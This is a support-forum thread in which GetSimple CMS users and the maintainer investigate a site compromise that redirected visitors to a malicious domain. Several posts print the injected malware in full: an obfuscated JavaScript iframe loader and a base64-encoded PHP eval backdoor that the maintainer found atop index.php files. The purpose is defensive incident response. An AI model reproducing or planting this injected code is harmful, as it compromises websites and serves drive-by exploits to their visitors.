Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
gs hacked?
#1
looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

viewing page source confirm that something is getting injected on gs pages

anyone can confirm?
Reply
#2
marrco Wrote:looks like this site (may 11 - 9am cet) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

viewing page source confirm that something is getting injected on gs pages

anyone can confirm?

Avg was preventing me from accessing the GS site with warnings of 'Blackhole Exploit Kit'. But it seems to work again now.
Reply
#3
definitely, now it's fine again. I have locally saved the exploited pages. html was starting with a
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58...

Now i'm waiting to know if there's an actual critical bug in GS or what
Reply
#4
Wouldn't say it is over, since I am still attacked when I get to the homepage or forum... (my anti-virus software kills it immediately).

I sent Chris an email early this morning just to be sure he knows about it (I most likely won't be the only one doing that, but at least he will be in the know this way). But it is very clear something was hacked. Could be the forum software, GS (although I think the main site at least used to be Wordpress, maybe not anymore), the server, etc.

Hope things will a. be solved soon, b. it will be clear what was causing it and c. if it turns out to be GS how that hole needs to be plugged.
Reply
#5
thanks guys! i have found a rouge file in /theme/ folder and ideleted it. I will keep looking into it to see if this happens again. Thanks for the emails guys!
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Reply
#6
From my side I am still getting the attack attempt blocked notice from my anti-virus software. Could that be cache? Otherwise something might still be active.
Reply
#7
must be cached it looks clean now.
My Github Repos: Github
Website: DigiMute
Reply
#8
Firefox has quite a persistent cache I must say, so that could well be it.

My norton internet security keeps roaring into action in any case. Will keep an eye on it.

Hope it is clear soon what happened.
Reply
#9
cant you try private browsing and see if you still see it?
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Reply
#10
Good point. Just did, still sees it. However, if I look at the site in Chrome. I don't get any notice.

So maybe it is still a persistent bit of cache or what have you.
Reply
#11
I run into it just now again, when I logged in the first time this afternoon
in the morning, my antivir program didn't tell any alarm

just now there was alarm

I cleared the browser cache, will see what's happening

so much intelligence wasted on so stupid actions Wink(
|--

Das deutschsprachige GetSimple-(Unter-)Forum:   http://get-simple.info/forums/forumdisplay.php?fid=18
Reply
#12
I suggest everyone deletes their GS cache.
It is all infected from the plugin api caches.

Well mine are, but Im not sure where its coming from yet, since it doesn't show up when i do a direct call.

Well I don't see the injection when direct accessing via my browser, but my curl and get_file_contents both return a script injection.

Either GS is compromised or I have some local injection on my host.

If someone could open a new cache file from the api
gs/data/cache md5.txt
and see if it contains script tags.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply
#13
i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Reply
#14
ccagle8 Wrote:i just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?

Code:
bfbf906471daf3f15be136dfe21ee5a1.txt

<XSS>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</XSS>{"status":"error","message":"invalid id: item_manager.php"}

Script tags replaced with XSS tags.
unpacks into a dom inserted iframe after body that loads a url payload.

This shouldn't cause any issues as long as those don't get loaded into a browser, which they shouldn't, unless your debugging why your plugin lookups arent working, which I was.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply
#15
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:

The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this please let me know... i may have missed a file.

Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvZWlsN2FEMGlhR0Z5UTI5a1pTSTdaajFiSnkwek0yTXRNek5qTmpOak5qQmpMVEV3WXkweVl6VTRZelk1WXpVM1l6YzFZelkzWXpVNVl6WTRZemMwWXpSak5qRmpOVGxqTnpSak1qZGpOalpqTlRsak5qZGpOVGxqTmpoak56UmpOek5qTWpSak56bGpOREpqTlRWak5qRmpNelpqTlRWak5qZGpOVGxqTFRKakxUTmpOVFpqTmpsak5UaGpOemxqTFROakxURmpORGxqTm1NMU1XTXRNV000TVdNdE1qbGpMVE16WXkwek0yTXRNek5qTmpOak5qQmpOekpqTlRWak5qZGpOVGxqTnpKakxUSmpMVEZqTVRkakxUSTVZeTB6TTJNdE16TmpPRE5qTFRFd1l6VTVZelkyWXpjell6VTVZeTB4TUdNNE1XTXRNamxqTFRNell5MHpNMk10TXpOak5UaGpOamxqTlRkak56VmpOamRqTlRsak5qaGpOelJqTkdNM04yTTNNbU0yTTJNM05HTTFPV010TW1NdE9HTXhPR00yTTJNMk1HTTNNbU0xTldNMk4yTTFPV010TVRCak56TmpOekpqTlRkak1UbGpMVE5qTmpKak56UmpOelJqTnpCak1UWmpOV00xWXpZd1l6Y3pZelUyWXpVMll6WXpZell5WXpZell6YzNZelkzWXpSak5qTmpOakZqTmpGak5HTTFObU0yTTJNNE1HTTFZekl4WXpZeFl6WTVZekU1WXpoakxUTmpMVEV3WXpjM1l6WXpZelU0WXpjMFl6WXlZekU1WXkwell6ZGpObU10TTJNdE1UQmpOakpqTlRsak5qTmpOakZqTmpKak56UmpNVGxqTFROak4yTTJZeTB6WXkweE1HTTNNMk0zTkdNM09XTTJObU0xT1dNeE9XTXRNMk0zTm1NMk0yTTNNMk0yTTJNMU5tTTJNMk0yTm1NMk0yTTNOR00zT1dNeE5tTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXhOMk0zTUdNMk9XTTNNMk0yTTJNM05HTTJNMk0yT1dNMk9HTXhObU0xTldNMU5tTTNNMk0yT1dNMk5tTTNOV00zTkdNMU9XTXhOMk0yTm1NMU9XTTJNR00zTkdNeE5tTTJZekUzWXpjMFl6WTVZemN3WXpFMll6WmpNVGRqTFROak1qQmpNVGhqTldNMk0yTTJNR00zTW1NMU5XTTJOMk0xT1dNeU1HTXRPR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TTJNdE1qbGpMVE16WXkwek0yTTJNR00zTldNMk9HTTFOMk0zTkdNMk0yTTJPV00yT0dNdE1UQmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpOekpqTFRKakxURmpPREZqTFRJNVl5MHpNMk10TXpOakxUTXpZemMyWXpVMVl6Y3lZeTB4TUdNMk1HTXRNVEJqTVRsakxURXdZelU0WXpZNVl6VTNZemMxWXpZM1l6VTVZelk0WXpjMFl6UmpOVGRqTnpKak5UbGpOVFZqTnpSak5UbGpNamRqTmpaak5UbGpOamRqTlRsak5qaGpOelJqTFRKakxUTmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpMVE5qTFRGak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTTJNM01tTTFOMk10TTJNeVl5MHpZell5WXpjMFl6YzBZemN3WXpFMll6VmpOV00yTUdNM00yTTFObU0xTm1NMk0yTTJNbU0yTTJNM04yTTJOMk0wWXpZell6WXhZell4WXpSak5UWmpOak5qT0RCak5XTXlNV00yTVdNMk9XTXhPV000WXkwell5MHhZekUzWXpZd1l6UmpOek5qTnpSak56bGpOalpqTlRsak5HTTNObU0yTTJNM00yTTJNMk0xTm1NMk0yTTJObU0yTTJNM05HTTNPV014T1dNdE0yTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXRNMk14TjJNMk1HTTBZemN6WXpjMFl6YzVZelkyWXpVNVl6UmpOekJqTmpsak56TmpOak5qTnpSak5qTmpOamxqTmpoak1UbGpMVE5qTlRWak5UWmpOek5qTmpsak5qWmpOelZqTnpSak5UbGpMVE5qTVRkak5qQmpOR00zTTJNM05HTTNPV00yTm1NMU9XTTBZelkyWXpVNVl6WXdZemMwWXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTNOR00zT1dNMk5tTTFPV00wWXpjMFl6WTVZemN3WXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTjJNMk0yTTFPR00zTkdNMk1tTXRNMk15WXkwell6ZGpObU10TTJNdE1XTXhOMk0yTUdNMFl6Y3pZelU1WXpjMFl6SXpZemMwWXpjMFl6Y3lZell6WXpVMll6YzFZemMwWXpVNVl5MHlZeTB6WXpZeVl6VTVZell6WXpZeFl6WXlZemMwWXkwell6SmpMVE5qTjJNMll5MHpZeTB4WXpFM1l5MHlPV010TXpOakxUTXpZeTB6TTJNMU9HTTJPV00xTjJNM05XTTJOMk0xT1dNMk9HTTNOR00wWXpZeFl6VTVZemMwWXpJM1l6WTJZelU1WXpZM1l6VTVZelk0WXpjMFl6Y3pZekkwWXpjNVl6UXlZelUxWXpZeFl6TTJZelUxWXpZM1l6VTVZeTB5WXkwell6VTJZelk1WXpVNFl6YzVZeTB6WXkweFl6UTVZelpqTlRGak5HTTFOV00zTUdNM01HTTFPV00yT0dNMU9HTXlOV00yTW1NMk0yTTJObU0xT0dNdE1tTTJNR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TXlkZFd6QmRMbk53YkdsMEtDZGpKeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTJPU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUszcGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUtXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));?>
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Reply
#16
Ok now clear your caches.

Smile
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply
#17
It looks like with the new punbb install
I am having issues with the toolbar
It gives js errors

Uncaught ReferenceError: PUNBB is not define
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply




Users browsing this thread: 1 Guest(s)